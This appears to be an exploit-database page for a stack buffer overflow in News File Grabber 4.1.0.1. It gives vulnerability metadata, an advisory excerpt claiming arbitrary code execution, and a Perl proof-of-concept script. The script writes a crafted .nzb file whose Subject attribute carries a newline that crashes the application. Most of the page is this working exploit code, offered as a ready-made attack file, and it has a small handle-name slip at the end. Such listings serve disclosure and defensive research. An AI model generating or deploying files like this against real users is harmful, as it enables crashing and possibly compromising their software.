header-logo
Suggest Exploit
vendor:
News File Grabber
by:
Parveen vashishtha
7.5
CVSS
HIGH
Remote stack-based buffer-overflow
121
CWE
Product Name: News File Grabber
Affected Version From: 4.1.0.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:newsfilegrabber:newsfilegrabber:4.1.0.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

News File Grabber Subject Line Stack Buffer Overflow perl exploit

Buffer overflow exists in Subject parameter of the .nzb file. By Passing a newline char it crashes. So here you go.

Mitigation:

No official mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22617/info

News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.

This issue affects version 4.1.0.1; other versions may also be affected. 

#!/usr/bin/perl
# ===============================================================================================
#                News File Grabber Subject Line Stack Buffer Overflow perl exploit 
#                               By Parveen vashishtha (parveen_vashishtha@yahoo.com)
# ==============================================================================================          
# Reference : https://www.securityfocus.com/bid/22617
#
# 
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing a newline char it crashes
# So here you go.
# 
#================================================================================================

use strict;

my($file_header)="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n".
			"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n".
			"<!-- NZB Generated by Parveen Vashishtha -->\n".
			"<nzb xmlns=\"http://www.google.com\">\n\n";

my($file_end)="</segment>\n".
"</segments>\n".
"</file>\n".
"</nzb>\n";


open(OUTPUTFILE, ">poc.nzb");                        # Crafted .NZB file 
 
print OUTPUTFILE $file_header;                       # Writing Header

print OUTPUTFILE "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"";    # Vulnerable SUBJECT parameter

print OUTPUTFILE "\\n";

print OUTPUTFILE "\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name";
print OUTPUTFILE $file_end;                                     # End of file


close(OUTFILE);